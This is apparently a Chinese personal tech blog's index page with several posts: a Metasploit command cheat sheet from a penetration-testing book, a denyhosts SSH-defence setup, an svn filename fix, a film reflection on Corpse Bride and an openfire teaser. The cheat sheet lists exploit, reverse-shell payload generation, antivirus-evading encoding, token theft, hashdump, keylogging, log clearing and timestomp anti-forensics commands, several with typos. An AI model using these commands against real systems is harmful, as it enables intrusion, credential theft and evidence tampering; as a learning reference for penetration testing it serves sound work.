metasploit命令参考

发布在 Linux

节选自《metasploit渗透测试指南》

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
show  exploits 列出所有渗透攻击模块
show payloads 列出所有攻击载荷
show auxiliary 列出所有辅助模块
search name 搜索
info 列出详细信息
use name 使用
show options 查看参数

show targets 查看某模块支持的目标平台
show advanced 查看高级选项

set autorunscript migrate -f 攻击完成后自动迁移到另一个进程
check 检测目标是否对选定的渗透攻击存在相应的漏洞
exploit 执行渗透攻击
exploit -j 后台执行
exploit -z 成功渗透后不与会话交互
exploit -e encoder 指定攻击载荷编码方式
exploit -h 帮助

sessions -l 列出多个会话
sessions -l -v 列出会话同时列出详细信息
sessions -s scritp 在所有活跃会话中执行特定meterpreter脚本
sessions -K 杀死所有活跃会话
sessions -c cmd 在所有活跃会话上执行某命定
sessions -u sessionID 升级一个普通的win shell 到 meterpreter shell

db_conreate name 创建数据库
db_connect name 链接数据库
db_namp 把namp的扫描结果存入数据库  hosts services查看结果
db_autopwn -h
db_autopwn -p -r-e 对发现的所有端口执行db_autopwn
db_destroy 删除当前数据库
db_destory user:pswd@host:port/dbname
db_status 查看

meterpreter命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
help 帮助
run scriptname 运行meterpreter脚本, 在scripts/meterpreter目录
sysinfo列出受控住记系统信息
ls 列目录
use priv 扩展meterpreter库
ps 列进程
migrate PID 迁移
use incognito 加载incognito功能来盗取用户令牌
list_tokens -u 列出目标主机用户可用令牌
list_tokens -g 同上,列出用户组的
impersonate_token DOMAIN_NAME\\USERNAME
steal_token PID 到去给定进程的可用令牌进行假冒
drop_token 停止假冒令牌
getsystem 提权
shell 利用可用令牌运行shell
execute -f cmd.exe -i 执行cmd
execute -f cmd.exe -i -t  用可用令牌执行cmd

execute -f cmd.exe -i -H -t 用所有可用令牌执行cmd并隐藏该进程
rev2self 回到初始用户
reg commend 操作注册表
setdesktop number 切换用户界面
screenshot 屏幕截图
upload/download file 上传下载文件
keyscan_start/dump/stop  键盘记录
getprivs 提权??
uictl enable keyboart/mouse  操纵目标的键盘鼠标
background 将当前的seterpreter shell 转为后台执行
hashdump 导出目标主机口令hash值
use sniffer 加载嗅探模块
sniffer_interfaces 列出开放大端口
sniffer_dump interfaceID pcapname 启动嗅探
sniffer_start interfaceID packer-buffer 数据包缓冲区嗅探
sniffer_stats interfaceID 嗅探的统计数据
sniffer_stop interfaceID 停止嗅探
clearv 清除日志
timestomp 修改文件属性 反取证调查
reboot 重起


msfpayload命令

1
2
3
4
5
6
7
8
msfpayload -h 帮助
msfpayload windows/meterpreter/bind_tcp O 列出可用的攻击载荷
msfpayload windows/meterpreter/bind_tcp O. 列出可用的攻击载荷配置项
msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx X > payload.exe 生成exe

msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xx R > payload.raw 生成raw原始文件,在msfencode中使用
msfpayload windows/meterpreter/bind_tcp LPORT=xx C > payload.c 生成c格式的shell code
msfpayload windows/meterpreter/bind_tcp LPORT=xx J > payload.java 生成javascript字符串


msfencode 命令

1
2
3
4
5
6
7
-h 帮助
-l 列出可用的编码器
-k 隐藏(不一定每次都可用)
msfencode -i raw文件 -o 输出文件名 -x 指定模板 -e 编码器 -c 次数 -t 生成什么格式
msfpayload windows/meterpreter/bind_tcp LPORT=xx R|msfencode -e x86/_countdown -c 5 -t raw| msfencode -e x86/shikata_ga_nai -c 5 -t exe -o mulit_encode.exe
多次编码示例
msfencode -i xx.raw BufferRedister=ESI -e x86/alpha_mixed -t c  创建一个纯数字字母的shellcode 由esi指向,c语言输出


msfcli命令

1
2
3
4
msfcli|gerp exploit 列出攻击模块
msfcli|grep exploit/windows 列出windows相关模块
msfcli expliot/windows/smb/ms08_067_netapi PAYLOAD= windows/meterpreter/bind_tcp LPORT=443 RHOST=x.x.x.x E
对目标发起netapi攻击 bind_tcp载荷 绑定443端口

评论和分享

centos安装denyhosts

发布在 Centos

最近不知道得罪了哪路大神,一直都有坏人暴力破解本站的SSH登录密码。想安安静静的写博客就这么难么…没办法,那就安个denyhosts吧。

centos下直接使用Yum安装即可:yum install denyhosts.noarch

当然也可以下载编译安装。安装好后,配置文件是/etc/denyhosts.conf,参数说明如下:

SECURE_LOG = /var/log/secure#ssh日志文件

HOSTS_DENY = /etc/hosts.deny #将阻止IP写入到hosts.deny

PURGE_DENY =30m#过多久后清除已阻止IP

BLOCK_SERVICE = sshd#阻止服务名

DENY_THRESHOLD_INVALID = 5//允许无效用户(在/etc/passwd未列出)登录失败次数,允许无效用户登录失败的次数.

DENY_THRESHOLD_VALID = 10#允许普通用户登录失败的次数

DENY_THRESHOLD_ROOT = 1//允许root登录失败的次数

DENY_THRESHOLD_RESTRICTED = 1#设定 deny host 写入到该资料夹

WORK_DIR = /usr/share/denyhosts/data #将deny的host或ip纪录到Work_dir中

SUSPICIOUS_LOGIN_REPORT_ALLOWED_HOSTS=YES

HOSTNAME_LOOKUP=YES #是否做域名反解

LOCK_FILE = /var/lock/subsys/denyhosts #将DenyHOts启动的pid纪录到LOCK_FILE中,已确保服务正确启动,防止同时启动多个服务。

ADMIN_EMAIL = a@b.com #设置管理员邮件地址

SMTP_HOST = localhost

SMTP_PORT = 25

SMTP_FROM = DenyHosts nobody@localhost

SMTP_SUBJECT = DenyHosts Report

AGE_RESET_VALID=5d

AGE_RESET_ROOT=25d

AGE_RESET_RESTRICTED=25d

AGE_RESET_INVALID=10d

DAEMON_LOG = /var/log/denyhosts#自己的日志文件

DAEMON_SLEEP = 30s

DAEMON_PURGE = 1h#该项与PURGE_DENY 设置成一样,也是清除hosts.deniedssh 用户的时间

配置完成后,启动服务并设置开机启动:

1
2
service denyhosts start
chkconfig denyhosts on

然后查看 /etc/hosts.deny 文件,发现里面已经有记录了:

1
2
3
4
5
6
7
8
9
10
11
12
13
[root@miss_yi ~]# tail /etc/hosts.deny
# DenyHosts: Mon Oct 20 17:19:38 2014 | ALL: 74.221.172.28
ALL: 74.221.172.28
# DenyHosts: Mon Oct 20 17:19:38 2014 | ALL: 117.21.173.175
ALL: 117.21.173.175
# DenyHosts: Mon Oct 20 17:19:38 2014 | ALL: 112.78.3.196
ALL: 112.78.3.196
# DenyHosts: Mon Oct 20 17:19:38 2014 | ALL: 181.143.230.74
ALL: 181.143.230.74
# DenyHosts: Mon Oct 20 17:19:38 2014 | ALL: 216.151.221.194
ALL: 216.151.221.194
[root@miss_yi ~]# wc /etc/hosts.deny
771 4628 30294 /etc/hosts.deny

评论和分享

今天更新文件时候,svn突然不好用了,报错:

1
2
[xsy@miss_yi bomupload]$ svn rm bom/upload/45299790@qq.com_1413255461.74.zip
svn: E200009: 'bom/upload/45299790@qq.com_1413255461.74.zip': a peg revision is not allowed here

原因就在于文件名中的@符号,解决办法如下:

1
2
[xsy@miss_yi bomupload]$ svn rm bom/upload/45299790\@qq.com_1413255461.74.zip@
D bom/upload/45299790@qq.com_1413255461.74.zip

在文件名最后添加@以及在中间的@前添加‘\’即可。

这个方法解决了我的问题,更多方法参考https://stackoverflow.com/questions/757435/how-to-escape-characters-in-subversion-managed-file-names

评论和分享

僵尸新娘是为数不多的几部从高中看到现在依然不会厌倦的的电影之一,除了各个经典台词之外,里面的各种音乐也是超级棒。

不过始终有一个问题盘桓在我脑中:维克多最后真的是因为爱才迎娶艾米莉的吗?

不得不说,艾米莉对维克多是十分好的。即便维克多欺骗了自己,也很快的原谅了他,最后还用自己的身体为维克多挡下致命一刀。但促使维克多做出决定的,却是在他得知心中的白玫瑰——维多利亚要嫁给别人,而艾米莉宁愿让他走也不愿伤害他的情况下。

维克多并不知道维多利亚是被迫嫁人,只好颓然的说了一句:“i’m too late.”在这种情况下,无意间听到了艾米莉对骨耐德回答,将会是一种怎样的心态呢?一方面,一个女人弃自己而去;另一方面,一个女人对自己如此深情。所以当骨耐德老人问他是否明白这种选择付出的代价时,维克多握起艾米莉的手,说:“i do.”

但事情总是戏剧性的,当维克多对艾米莉说出了完整的婚礼誓言,艾米莉却看到了角落中的维多利亚。艾米莉最后决定放弃维克多,对他说出了相当经典的台词:“I was a bride. My dreams were taken from me. But now - now I’ve stolen them from someone else. I love you, Victor, but you are not mine.”

阅读全文

最近需要搭建一套live chat,于是选中了openfire这个比较不错的开源软件。至于介绍、安装等步骤这里不再介绍,记录一下我搭建完毕后遇到一个奇葩的问题:建立管理员账户后却无法登录后台,提示帐号不存在或者密码错误,版本是3.9.3。

阅读全文
  • 第 1 页 共 1 页
作者的图片

Roy

微信公众号:hi-roy


野生程序猿


China